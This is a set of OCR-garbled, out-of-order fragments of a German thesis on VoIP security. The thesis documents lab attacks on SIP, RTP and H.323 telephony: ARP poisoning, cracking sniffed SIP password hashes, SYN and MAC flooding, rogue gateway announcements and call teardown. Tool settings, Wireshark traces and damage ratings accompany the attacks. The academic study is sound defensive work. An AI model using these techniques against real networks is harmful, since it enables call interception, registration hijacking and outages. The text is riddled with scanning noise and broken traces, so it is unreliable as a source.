23. Konkretisierung Problemstellung Pflichtenheft 10 Definieren der Ziele Realisierungskonzept Evaluierung weiterer Tools Realisierungskonzept 15 Festlegen der VOIP Angriffe Bereitschaft f r Realisierung Realisierung Aufbau Testumgebung Testumgebung 55 Analyse und Angriffe auf VOIP Resultate der Analysen u Angriffe Analyse und Angriffe auf LAN Erkennung Schwachstellen Bewertung der Resultate Traces und Berichte Auswertung Gesamtbewertung Projektbericht 20 Erreichte Ziele Erfahrungen Schlussbemerkung 4 3 Arbeitszeiten Die Gesamtarbeitszeit f r die Diplomarbeit soll sich im Rahmen von 360 Arbeitsstunden bewegen Daraus resultiert eine w chentliche Arbeitszeit von 14 Stunden welche wie folgt einzuhalten ist Diplomand Stefan Sch r Dauer 4 Stunden Montag 4 Stunden Mittwoch 6 Stunden Samstag Kommt es zu einem Terminkonflikt mit anderen Verpflichtungen so k nnen die Arbeitszeiten ausnahmsweise individuell in derselben Arbeitswoche verschoben werden In jedem Fall ist dabei das w chentliche Soll von total 14 Arbeitsstunden einzuhalten Ebenfalls sind f r die 2 Wochen vom 22 12 2008 4 1 2009 infolge Firmen Urlaubes ein w chentliches Soll von je 40 Stunden eingeplant Zus tzlich kann bei Bedarf gegen Ende Januar eine weitere Urlaubswoche bezogen und diese Zeit ebenfalls in die Diplomarbeit investiert werden Die aufgewendeten Zeiten f r den Kurs Pr sentationstechnik Sitzungen und Re
24. MS TCP Loopback interface 0G 14 2 22 Broadcom 446 167108 Integrated Controller laner Minip ees un ES 5 Bu 2 Blustooth Ger e lt CPAN gt Routen etzwer iel 6 6 6 6 6 9 6 6 P fh fh ak I Sk jat et 9 Z z HHEOK ORR Anzahl 20 K Nm j G o 7 1 7 a 1 1 mi md pi SSOr OKs fuk ok oh pii H NNNM N Mp St ndige Routen Ke ine P Dokumente und EinstellungenAstefan gt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 163 oo Berner Fachhochschule ee Technik und Informatik Software Schule Schweiz Untenstehender Wireshark Trace zeigt den Host vor dem Angriff Abgehende RTP Pakete ins Internet werden zum Gateway 10 1 1 1 mit der MAC Adresse 00 0f cc 21 79 14 gesendet EB Untitied Wireshark ei er Eile Edit View Go Capture Analyze Statistics Help Frame 35 214 bytes on wire 214 bytes captured Ethernet ar Src Dell_fo gt 43 00 a 22 f0 Dst Netopia_21 79 14 00 0f cc 21 79 Untenstehendes Bild zeigt den Host nach dem Angriff Abgehende RTP Pakete ins Internet werden zum Gateway 10 1 1 2 mit der MAC Adresse 00 0f cc e3 9d a8 gesendet wo der Angreifer mittels Hub auf der externen Seite s mtliche Daten mit Wireshark aufzeichnet Der angegriffene Host kriegt von all dem nichts mit das Internet war f r ihn zu jeder Minute unterbruchslos verf gbar ED Untitieg Wireshark File Edit View Go Capture Analyze Statistics Help
25. S Wireless 15 u IP address MAC address OUI fingerprint Host name 10141 000FCC217914 Netopia Inc MAC Address Scanner 10 1 1 101 001422F02243 Dell Inc r Target All hosts in my subnet Range r From KrEFEFE r To 1 e A SE Se pil romiscuous Mode Scanner All Tests kaka kaka ka ka kal APR amp VolP Lost packets 0 Es ist in den Tab APR zu wechseln und in der oberen Taskliste das Symbol zu klicken Die zuvor im Netzwerk gefundenen Komponenten werden auf der linken Seite des Fensters New ARP Poison Routing aufgelistet aje om me v 2 ommksoun Ber n amp Decoders Network Pay Sniffer Eg Cracker Eo Traceroute EM CCDU in Wireless Que 1 ry uae cal New ARP Poison Routing 2S BEE APR SSH 1 0 m B APR HTTPS 0 WARNING IH JA APR RDP 0 APR enables you to hijack IP traffic between the selected host on the left list and all selected hosts on the right list in both directions If a selected host has routing capabilities WAN traffic will be intercepted as well Please note that since your B APR FTPS 0 machine has not the same performance of a router you could cause DoS if you set APR between your Default Gateway and 5 APR POP3S 0 all other hosts on your LAN APR IMAPS 0 APR LDAPS 0 10 1 1 1 OOOFCC21 7914 10 1 1 101 001422F02243 10 1 1 102 0016E35B3F46 10 1 1 103 0080F05F6789 10 1 1
26. fa Pe r 410 7 4 IR AM DDT7 4f b3 8a 4 ik 41 28 z Ethernet Frame 71273 60 bytes on wire 60 bytes captured Ethernet II src fa 49 36 54 fb f1 fa 49 36 54 fb f1 Dst 7f 12 73 f5 ab 44 7 Destination 7f 12 73 f5 ab 44 7f 12 73 f5 ab 44 4 Source fa 49 36 54 fb f fa 49 36 54 fb f1 Type unknown 0x2277 3 Data 46 bytes Data 000000000000000000000000000000000000000000000000 N Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 144 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Sobald die MAC Tabelle des Switches durch den Angreifer erfolgreich geflutet worden ist sendet der Switch alle Datenpakete an alle Ports Paket Nr 71300 und 71303 sind RTP Sprachpakete der beiden User Agents 4111 und 4129 In der sehr grossen Menge der vom Angreifer gesendeten gef lschten Ethernet Pakete gehen die zu ersniffenden Nutzdaten des Angriffsziels fast unter Diese sind w hrend der Wireshark Aufzeichnung in dem sich immer wieder aktualisierenden Fenster vor lauter gef lschten Ethernet Paketen fast nicht ersichtlich Jedoch kann nach erfolgtem Angriff nach RTP Paketen sortiert und das ganze Gespr ch vollumf nglich wiedergegeben werden siehe auch Kapitel 5 2 1 Bere Eile Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply Time Source Destination Protocol Info 71297 5 068636 2cC b1 02 e1 74 T0 2c ee 38 9e cCd 88 0x22
27. http de wikipedia org wiki Real Time_Transport_Protocol http www oxid it sterm html http de wikipedia org wiki Spannin g_Tree_Protocol http de wikipedia org wiki Switch_ Computertechnik http de wikipedia org wiki SYN Flood http de wikipedia org wiki Transmi ssion_Control_ Protocol http de wikipedia org wiki Transpor t_Layer_Security S Sch r MAS 06 02 20 Seite 205 USER AGENT User Agent UDP Verf gbarkeit Vertraulichkeit VLAN VOIPSA Wireshark X lite Yersinia Diplomarbeit VOIP Security Ein User Agent ist ein Client Programm mit dem ein Netzwerkdienst genutzt werden kann Der User Agent ist die Schnittstelle zum Benutzer die die Inhalte darstellt und Befehle entgegennimmt Beispiele fur User Agents sind Webbrowser E Mail Programme IP Phone Clients Das User Datagram Protocol Abk UDP ist ein minimales verbindungsloses Netzwerkprotokoll das zur Transportschicht der Internetprotokollfamilie geh rt Aufgabe von UDP ist es Daten die Uber das Internet bertragen werden der richtigen Anwendung zukommen zu lassen Die Verf gbarkeit eines technischen Systems ist die Wahrscheinlichkeit oder das Ma dass das System bestimmte Anforderungen zu bzw innerhalb eines vereinbarten Zeitrahmens erf llt und ist somit eine Eigenschaft des Systems Sie ist ein QUser Agentlit tskriterium Kennzahl eines Systems Vertraulichkeit ist die Eigenschaft einer Nachricht nur f r einen
28. im Gange Dokumentation Die get tigten Angriffe und Analysen werden laufend dokumentiert und die Resuliste festgehalten Ebenfalls wird perallel dazu ein Arbeits Log gef hrt Sitzung mit Betreuer 5 Sitzung mit Betreuer steht am 5 12 2008 an Ziel Besprechung VOIP Angriffe und allgemeiner Ststus Abstract verfsssen Upload bis sp testens 28 11 2008 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 229 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 4 Statusbericht Nr 4 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 06 02 20 Datum Ststus bericht Projektbeteiligte Auftrsggebe Selbstecingebrschtes Thems Berever Kurt J rmenn Aastra Telecom Schweiz AG Expete Mathiss Engel Casssrius AG Diplomand Autor Ststusbericht Stefan Sch Asstra Telecom Schweiz AG Zusammenfassung Posten IST Begr ndung ge u Temine Inmitten der Angriffe Analysen Tools teilweise sehr aufw ndig und zeitraubend Leitung Motivation 100 susgelsstet zeitliches Wochensoll bei weitem berschritten Legende IST Situation Legende Tendenz suf Kurs 7 Verbsserung vom Kurs leicht gleich bleibend sbgewichen 9 stark vom Kurs abgewichen Vers chiechte ung Ubersicht der Arbeiten Abgeschlossene Realsierungskonzept definiert Ar beiten e Abstract und Fflichtenheft hoch geladen Laufende offene e Reslsierung Arbeiten Die Analysen und VOIP Angriffe suf dss SIP Prota
29. lt znet etc pt gt Synthetic Technologies 2001 Creating Atacking bs Taek Ctrl C to stop Killed synflood 10 1 1 10 Situation beim Angriffsziel Bis und mit Paket Nr 1577 ist der Asterisk Proxy Server damit besch ftigt die RTP Sprachpakete der User Agents 4111 und 4129 weiterzuleiten Mit Paket Nr 1578 startet der Angriff Sofort beginnt der Asterisk Proxy Server die Anfragen zu beantworten rote Pakete und kommt seiner zuvor get tigten Aufgabe nicht mehr nach fj ee rat TRace101 pcap Wireshark File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 1569 14 244396 10 1 1 101 10 1 1 129 RTP PT ITU T G 711 PCMU SSRC 0x566A810F Seq 46475 Time 1570 14 261775 10 1 1 129 10 1 1 101 RTP PT ITU T G 711 PCMU SSRC 0x311A0B04 Seq 23561 Time 1571 14 261999 10 1 1 101 10 7 3712T RTP PT ITU T G 711 PCMU SSRC 0x5159A494 Seq 21333 Time 1572 14 264153 10 1 1 121 10 1 1 101 RTP PT ITU T G 711 PCMU SSRC 0x7EF43060 Seq 26075 Time 1573 14 264324 10 1 1 101 10 1 1 129 RTP PT ITU T G 711 PCMU SSRC 0x566A810F Seq 46476 Time 1574 14 281780 10 1 1 129 10 1 1 101 RTP PT ITU T G 711 PCMU SSRC 0x311A0B04 Seq 23562 Time 1575 14 281988 10 1 1 101 310 1 1 121 RTP PT ITU T G 711 PCMU SSRC 0x5159A494 Seq 21334 Time 1576 14 284459 10 1 1 121 10 1 1 101 RTP PT ITU T G 711 PCMU SSRC 0x7EF43060 Seq 26076 Time 1577 14 284619 10 1 1 101 10 1
30. registrieren sich die User Agents je nach programmiertem Registrationsintervall bei vielen Ger teherstellern ist der Standardwert auf 3600 Sekunden eingestellt immer wieder von neuem beim SIP Proxy Server Registrar Untenstehend ist ein mit Wireshark aufgezeichneter Registrationsvorgang von User Agent 4119 zu sehen Nebst anderen Informationen wird auch im Message Header die Contact Information dem Registrar bermittelt Diese Information wird vom SIP Proxy Server verwendet und ankommende INVITE anfragen also ankommende Anrufe f r User Agent 4119 an die richtige IP Adresse und somit an den richtigen User Agent weiterleiten zu k nnen zuvor_gesniff_Reg_von_IN 4 File Edit View Go Capture Analyze Statistics Help Eilter S7p Expression Clear Apply User Datagram Protocol Src Port session Initiation Protocol m Request I Message Header B via SIP 2 0O UDP 10 1 1 151 18262 branch z9hG4bK d87 542 b77ba47e29442e71 1 d8754z2 rport 16 87 ansport UDP sent by Address 10 1 1 151 Sent by port 18262 Branch z9hG4bKk d8754z b77ba47e29442e71 1 d8754z RPort rport Max Forwards 70 Contact lt sip 4119 10 1 1 151 18262 rinstance 8d64371453347dib gt 5 Contact Binding lt sip 4119 10 1 1 151 18262 rinstance 8d64371453347d1b gt B URI lt sip 4119 10 1 1 151 18262 rinstance 8d64371453347d1b gt SIP contact address sip 4119 10 1 1 151 18262 amp To bob lt sip 4119 10 1 1 101 gt SIP Display
31. sich hierbei um ein Soft oder Hardphone handelt SIP wurde erstmals im Jahr 1999 von der IETF im RFC 2543 spezifiziert RFC 3261 ersetzte dann im Juni 2002 RFC 2543 sie ist die heute g ltige und anwendbare Spezifikation f r SIP Es folgten dann noch weitere wie RFC 3262 RFC 3263 RFC 3264 und RFC 3265 SIP dient dem Verbindungsauf und Abbau zwischen IP Telefonen und ist wie oben schon erw hnt ein Signalisierungsprotokoll Das heisst die Sprachdaten werden ber andere Protokolle ausgetauscht wie zum Beispiel ber RTP SIP wird ber TCP oder UDP bertragen und h rt normalerweise den Port 5060 ab Eine gesicherte bertragung mittels TCP wird sehr oft aus zeitlichen da die Telefonie eine Echtzeitanwendung ist und performanten Bauart der Endger te Gr nden nicht eingesetzt Hier zeigt sich dann somit auch schon die erste Verwundbarkeit von SIP SIP lehnt sehr eng an die Protokolle HTTP und SMTP an und verwendet wie diese auch textbasierte Nachrichten Die SIP Adressen gleichen dem Aufbau von E Mail Adressen z B sip 4111 10 1 1 121 2 1 1 SIP Architektur Eine SIP Infrastruktur enth lt in der Regel folgende 4 Komponenten User Agent Ist ein Soft oder Hardphone welches das SIP Protokoll zum Verbindungsauf Abbau einsetzt Der User Agent kann selbst ndig Anrufe initiieren und beantworten Wird auch in Kurzform als UA geschrieben Registrar Die User Agent registrieren sich beim Registrar Server Diese Registrierung
32. susgelsstet zeitliches Wochensoll bei weitem berschritten Legende ST Situation Legende Tendenz suf Kurs 7 Verbesserung vom Kurs leicht gleich bleibend sbgewichen 2 BOB ER tives Verschlechterung abgewichen Ubersicht der Arbeiten Abgeschlossene Besprechung mit Betreuer am 6 1 2009 Arbeiten Laufende offene e Reslsierung Arbeiten Die Analysen und Angriffe auf das Protokoll LAX sind noch im Gange Auch werden zur Zeit die Angriffe suf die Netzwerk infrastruk tur ausgef hrt Dokumentation Die get tigten Angriffe und Analysen werden laufend dokumentiert und die Resultate festgehalten Ebenfalls wird parsilel dazu ein Arbeits Log gef hrt Sitzung mit Betreuer 8 Sitzung mit Betreuer steht am 20 1 2009 an Ziel sigemeiner Stand Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 232 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 7 Statusbericht Nr 7 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 06 02 20 Datum Ststus bericht Projektbeteiligte Auftrsggebe Selbstcingebrschtes Thems Betreuer Kurt J rmenn Aastra Telecom Schweiz AG Experte Mathiss Engel Cassarius AG Diplomand Autor Ststusbericht Stefan Sch r Asstra Telecom Schweiz AG Zusammenfassung Posten IST Begr ndung ar ai Temine Dank Mehrleistung wieder im Zeitplan Qualit t Genauigkeit bei den Tests angsstrebt Gute Motivstion Ziel vor Augen
33. 1 129 RTP PT ITU T G 711 PCMU SSRC 0x566A810F Seq 46477 Time 1578 14 294420 215 101 200 204 10 1 1 101 TCP emperion gt http SYN Seq 0 win 65535 Len 0 1579 14 294484 10 1 1 101 215 101 200 204 TCP ttp gt emperion RST ACK Seq 1 Ack 1 Win 0 Len 0 1580 14 294670 86 196 71 142 10 1 1 101 TCP atc appserver gt http SYN Seq 0 win 65535 Len 0 1581 14 294679 10 1 1 101 86 196 71 142 TCP http gt atc appserver RST ACK Seq 1 Ack 1 win 0 Len 1582 14 294895 94 131 243 234 10 1 1 101 TCP lupa gt http SYN Seq 0 win 65535 Len 0 1583 14 294905 10 1 1 101 94 131 243 234 TCP ttp gt lupa RST ACK Seq 1 Ack 1 win 0 Len 0 1584 14 295066 37 155 5 62 10 1 7 101 TCP ansoft Im 2 gt http SYN Seq 0 win 65535 Len 0 1585 14 295084 10 1 1 101 37 133 3002 TCP http gt ansoft Im 2 RST ACK Seg 1 Ack 1 win 0 Len 0 m eeooos Nur noch selten gelingt es dem Asterisk Proxy Sever die RTP Pakete an die User Agents weiterzuleiten Die Gespr chsqualit t ist miserabel es ist keine Verst ndigung mehr zwischen den beiden User Agents m glich Der Asterisk Proxy Server beansprucht seine s mtlichen Ressourcen f r sich selbst um die Flut der SYN Pakete beantworten zu k nnen und die halboffenen Verbindungen zu steuern EIN KacelUl pcap Wireshark _ File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info PERE
34. 1 2 p 999 Die Werte im Einzelnen stehen wie folgt f r irdpresonder Aufruf Programm V Vorschau erzeugt mehr Logs i ethO Besagt tiber welche Schnittestelle des PC s die Daten gesendet werden sollen S10 1 1 2 IP Adresse des Gateways welcher bei den Hosts eingetragen werden soll p 999 Kosten Anzahl die in der Hosttabelle des Clients eingetragen wird p 999 erzeugt einen Eintrag Anzahl 1 was h chste Priorit t heisst pr BAcKTrack3 VMware Remote Console Devices Shell IRDP Responder ndir ding Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 162 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Untenstehender Wireshark Trace zeigt ein aufstartender Rechner In Paket Nr 437 sendet der Host eine Router Solicitation Nachricht und erfragt so den Default Gateway Mit Paket Nr 438 antwortet das Tool irdpresponder dem Host und teilt ihm mit dass der default Gateway die IP Adresse 10 1 1 2 hat Trace 112 startet auf aktuell File Edit View Go Capture Analyze Statistics Help Filter Expression Clear Apply No Time Source Destination Protocol Info SDD LAU VIODLTF U Re Re BRE AN RO IU EIS NONS Key 5L aL Ill ND IESINEIZULIKLAL lt SUU gt 436 111 408034 10 1 1 112 EEE NBNS Registration NB TESTNETZCITRIX1 lt 00 gt 437 112 079888 10 1 1 112 224 0 0 2 ICMP Router solicitation 438 112 080197 pee pe eB 62 J e IP A
35. 110110 il ora Lu bwiGcLO aL J AweG ABT GUEOG SOH cI EE 2 ul lt 67 gt gt 5 J jt As iAxUakE e JINFPn DDLErkUk gt 2KKc GAH 4 70450 t 48a UH N 0 C 2G HGA04bI Hal 9000 0040 45 d8 f sc EO2C7 CAL_Y File Edit View Go Capture Analyze Statistics Help Hex Find Backwards Filter o Signed 8 bit 33 Signed 32 bit 1483531939 Hexadecimal Unsigned 8 bit 93 Unsigned 32 bit 2811435357 Octal 5 q m Signed 16bit 493 32 bit float 4 08 r Binary 1 Frame 5 214 bytes on wire 214 bytes captured 9 L 6493 4 082820E 15 ry 3 02011101 Ethernet II Src Aastra_19 93 a7 00 08 5d 19 93 a7 f ren f ne Ya Internet Protocol Src 10 1 1 129 10 1 1 129 Dst Unsigned 16 bit t 6493 64 bit float 4802266 81 Text l User Datagram Protocol Src Port hbci 3000 Dst Por IX Show litte endian decoding Show unsigned as hexadecimal Stream length Fixed 8 Bit v u DIEET 1 ii i f P ii oa 7 0000 00 14 22 fO 22 43 00 08 5d 19 93 a7 08 00 45 80 Encoding Default OVR Size 172 Offset 0000 0008 7 HEX RWI 0579 00 c8 03 f1 00 00 40 11 SE COUMUL 01 81 Oa 01 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 126 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Im Terminalfenster wird nemesis von BackTrack 3 aus gestartet Nemesis wird dazu verwendet um ein g ltiges RTP Paket im Zusammenhang mit dem zuvor vo
36. 2009 S Sch r MAS 06 02 20 Seite 47 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz B File View Configure Tools Help SHO 2 ER 4 3 s yUmmEs084n O0 i Decoders E Network iy Satte F Cracker 8 Traceroute m CCDU x Wireless gt Query Cracker Realm User Name Password URI Nonce Response Method Type MR LM amp NTLM Hast ian as ae siia ses Ac REGIS IR NTLMv2 Hashes N 2 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Sniffen der Registrierungsdaten und dem Cracken des Passwortes kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit denselben Registrierungsdaten in das Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gef hrt Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Auch kann er sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Terminal melden Die M glichkeit denselben Angriff mit einem anderen Tool namens SIPCrack auszuf hren zu k nnen wird nachfolgend aufgezeigt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 48 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 6 1
37. 241 4 8 8 974933 Intelcor_07 3 50 CompalIn_0b ad 96 10 1 1 151 is at 00 0 07 f3 50 1 9 8 10 1 1 151 5 10 1 1 241 10 Sinn ARP who has 10 1 1 1 Tell 10 1 1 241 ARP 10 1 1 1 is at 00 0f cc 21 79 14 NBNS Name query NB XPPROF lt 00 gt a 13 9 301818 CompalIn_0b ad 96 Broadcast 14 9 302248 Netopia_21 79 14 CompalIn_Ob ad 96 15210 845961 10 1 1151 10 1 255 255 en amp Internet Protocol Src 10 1 1 241 10 1 1 241 Dst 10 1 1 151 10 1 1 151 version 4 Header length 20 bytes m Differentiated Services Field 0x00 DSCP 0x00 Default ECN 0x00 0000 00 ic cO 07 f3 50 00 le ec Ob ad 96 08 004500 Pee seres E 0010 00 5f 5e 6e 00 00 80 11 00 00 Oa O1 OL f1 0a OL Minen eee 0020 01 97 06 b7 06 40 00 4b 17 e6 1a 40 0000100 a Sa 0030 Oa 01 01 97 06 b8 10 00 37 00 38 00 36 00 3100 7 8 6 1 0040 5f 00 65 00 Ge 00 64 00 70 0a 88 1d 1a 00 47 00 _ e n d p G 0050 4e 00 55 00 20 00 47 00 61 00 74 00 65 00 6b 00 N U G a t e k 0060 65 00 65 00 70 00 65 00 72 03 80 01 00 e e p e r 4 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Da der Registrierungszustand eines Endpoints nicht dauernd vom Gatekeeper und dem Endpoint selbst berwacht wird ist dieser Angriff schwer zu erkennen Da noch abgehende Anrufe get tigt werden k nnen bemerkt dies der angegriffene Endpoint nicht sofort In dieser Zeit gehen alle ankommenden Anruf
38. 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARMING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer WA Dec 22 20 33 40 WARNINGL 3632 chan sin c 11564 sipsock read Recv error Connection reset hy peer Dec 22 20 33 40 WARHING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARNING 3632 chan sip c 11364 sipsock read Recy error Connection reset by peer Dec 22 20 33 41 WARNING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 42 WARNIHG 3632 chan sip c 11564 sipsock read Recv error Connection reset by peor Disconnected from Asterisk server Attempting to reconnect Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 39 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 2 3 4 c Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Alle angeschlossen User Agents beginnen miteinander zu Klingeln Die angerufenen User f hlen sich bel stigt werden von ihrer Arbeit abgelenkt sind verwirrt weil am anderen Ende kein Gespr chspartner Antwort gibt In dieser Zeit gehen eventuell wichtige Anrufe verloren respektive k nnen nicht beantwortet werden Die ganze PBX kann in einen instabilen Zustand oder gar zum Absturz kommen wie obiges Beispiel zeigt Somit ist mit diesem Tool auch ein Angriff g
39. 55 dd b4 Dst Netopia_21 79 14 00 0f cc 21 79 14 Internet Protocol Src 10 1 1 1 10 1 1 1 Dst 10 1 1 201 10 1 1 201 Internet Control Message Protocol 6 6 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Flooden k nnen einzelne IP Telefone oder der VOIP Server selbst angegriffen werden Die enorm grosse Anzahl der antwortenden Hosts wird dazu f hren dass das Angriffsziel seinen normalen Aufgaben nicht mehr nachkommen kann oder dies nur mit sehr grosser Verz gerung Verwerfen der anstehenden RTP Pakete bis hin zum Systemabsturz sind die Folgen dieses Angriffes Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 155 Berner Fachhochschule iu Technik und Informatik Software Schule Schweiz http www oxid it sterm html Hinweise zu Installation Verf gbarkeit Das Tool ist nicht in BackTrack3 enthalten Die Installation ist men gef hrt Benennung Angriffe Analyse Angriff Analyse gegen IP Spoofing Integrit t ssie eieiei Vertraulichkeit Eingesetztes Tool Verf gbarkeit sTerm exe Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert X X X Ziel Angriff Anal
40. 57 ed d2 e7 4c ae 0050 44 5c e2 5b 4a d5 c5 77 e8 c7 cO d8 54 5e fc 55 DY FW E RU A gt an nnen as AQ Tr 62 r rn rara hr hh hA rac snul e Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 127 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 5 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Das Flooding erlaubt einem Angreifer das Angriffsziel so zu attackieren dass w hrend dem Angriff weder ankommende noch abgehende Gespr che aufgebaut respektive gef hrt werden k nnen Bei schon bestehenden Gespr chsverbindungen wird mit dem Einsetzen des Floodings der Medienstrom RTP Pakete total unterbunden das Angriffsziel ist nur noch damit besch ftigt die ankommenden Flooding Pakete zu verarbeiten Obenstehende Folgen gelten sowohl wenn das Angriffsziel ein einzelnes Terminal oder ein Asterisk Proxy Server ist Einziger Unterschied ist die Auswirkung des Angriffes ob nur ein einziger User Agent alleine oder die ganze Telefoninfrastruktur betroffen ist Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 128 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 5 5 1 RTCP Bye teardown Integrit t ee an Vertraulichkeit Eingesetztes Tool Verf gbarkeit x nemesis mit RTP Paket
41. 65 IKE PSK 0 MySQL 0 Pe ERESSE sib SMB r By tows APA Rowing G Passworts Bf Timestamp SMB server Client Username Domain Password AuthType LM Ha 4 w r Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 45 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Sobald Cain amp Abel ein MD5 Hashwert ersnifft wird dieser im Ordner SIP unter Passwords abgelegt Beim Betrachten des Eintages ist ersichtlich dass alle zur Registrierung erforderlichen Werte ausser das Passwort im Klartext ber das Netzwerk transportiert werden Dies erm glicht es einem Angreifer aus dem MD5 Hashwert das Passwort zur ck rechnen zu k nnen sollten keine sicheren Passw rter verwendet worden sein was sehr oft der Fall ist Meistens werden als Passw rter auch gleich die internen Rufnummern verwendet also alles andere als sichere Passw rter File View Configure Tools Help japo kma o 2 ymmBsoe8n OF i amp Decoders P Network i Sniffer 67 Cracker BY Traceroute MM CCDU G Wireless Ey Query A Passwords ype Ge FTP i 7 18 35 5 Vzhi TgsMimi 4119 asterisk sipOdiidi Tdcsesss 4260ce779863b REGISTER MS 8 HTTP 1040 ED IMAP 0 LDAP 0 P POP3 0 sib SMB 0 BM Telnet 0 Bd VNC 0 amp TDS 0 E TNS 0 J SMTP 0 amp P NNTP 0 DCE RPC 0 BS MSKerb5 PreAuth 0 MR Radius Keys 0 Radius Users 0 ICAO GB IKE PSK 0 E MySQL 0 SNMP 0
42. 665147 0 0 0 0 255 255 255 255 DHCP DHCP Discover Transaction ID 0x836c40e 43728 665407 0 0 0 0 255225512552255 DHCP DHCP Discover Transaction ID 0x836c40e 43729 665617 0 0 0 0 255225522557255 DHCP DHCP Discover Transaction ID 0x836c40e 43730 665901 0 0 0 0 255 255 255 255 DHCP DHCP Discover Transaction ID 0x836c40e 43731 666055 10 1 1 1 255 255 255 255 DHCP DHCP offer Transaction ID 0x836c40e 43732 666375 0 0 0 0 255225572557255 DHCP DHCP Discover Transaction ID 0x836c40e 43733 666604 0 0 0 0 FE DHCP DHCP Discover Transaction ID 0x836c40e 43734 666827 10 1 1 1 255125532553255 DHCP DHCP Offer Transaction ID 0x836c40e 43735 667056 0 0 0 0 255 255 255 255 DHCP DHCP Discover Transaction ID 0x836c40e 43736 667274 0 0 0 0 255 255 255 255 DHCP DHCP Discover Transaction ID 0x836c40e 43737 6674 0 0 0 0 Fame Pa Se ee ee DHCP DHCP Discover Transaction ID 0x836c40e 43738 667687 0 0 0 0 2552255 2952255 DHCP DHCP Discover Transaction ID 0x836c40e 43740 5457 668236 0 0 0 0 255 255 255 255 DHCP DHCP Discover Transaction ID 0x836c40e 43741 5457 668498 0 0 0 0 255223322332255 DHCP DHCP Discover Transaction ID 0x836c40e 43742 5457 668690 0 0 0 0 25572557235725 DHCP DHCP Discover Transaction ID 0x836c40e Frame 43739 590 bytes on wire 590 bytes captured Ethernet II Src Netopia_21 79 14 00 0f cc 21 79 14 Dst Broadcast ff ff ff ff ff rff Tribes net Pr OLocel ssi Oe lente te ns ee ee a ee oe 55725572552255 User Datagram Prot
43. 8 3 1 Substandard H 235 1 Baseline Security Profile H 235 1 beschreibt die minimal H 235 Absicherung Unterst tzt werden Endpoint zu Gatekeeper Gatekeeper zu Gatekeeper und H 323 Getekeeper zu Gatekeeper Szenarien Die Verschl sselung und Authentifizierung wird mit symmetrischen Schl sseln gemacht F r die Signalisierungs Nachrichten bietet diese Verschl sselung lediglich eine Hop zu Hop Sicherheit 8 32 Substandard H 235 2 Signature Security Profile Bei H 235 2 wird eine asymmetrische Verschl sselung angewendet Mittels X 509 Zertifikaten und Signaturen werden einerseits eine Nichtabstreitbarkeit und andererseits eine Authentifizierung zwischen Hop zu Hop und End zu End Verbindungen gew hrleistet 8 33 Substandard H 235 3 Hybrid Security Profile H 235 3 benutzt sowohl die aus H 235 1 symmetrische Verschl sselung wie auch aus H 235 2 Signaturen und Zertifikate auf PKI basierend Dies bietet sehr gute Performanceeigenschaften insbesondere beim Verbindungsaufbau H 235 3 beschreibt die Sicherheit f r die Protokolle RAS H 225 0 Q 391 und H 245 welche alle die Option Authentication Only unterst tzen Dabei werden nur bestimmte Felder der Nachricht gesichert Dadurch ist es NAT m glich Ver nderungen an nicht gesicherten Nachrichtenfeldern vorzunehmen 8 34 Substandard H 235 4 Direct and Selective Routed Call Security Bei H 235 4 wird der Gespr chsaufbau direkt zwischen den Kommunikationsteilnehmern aufgebaut Der Gate
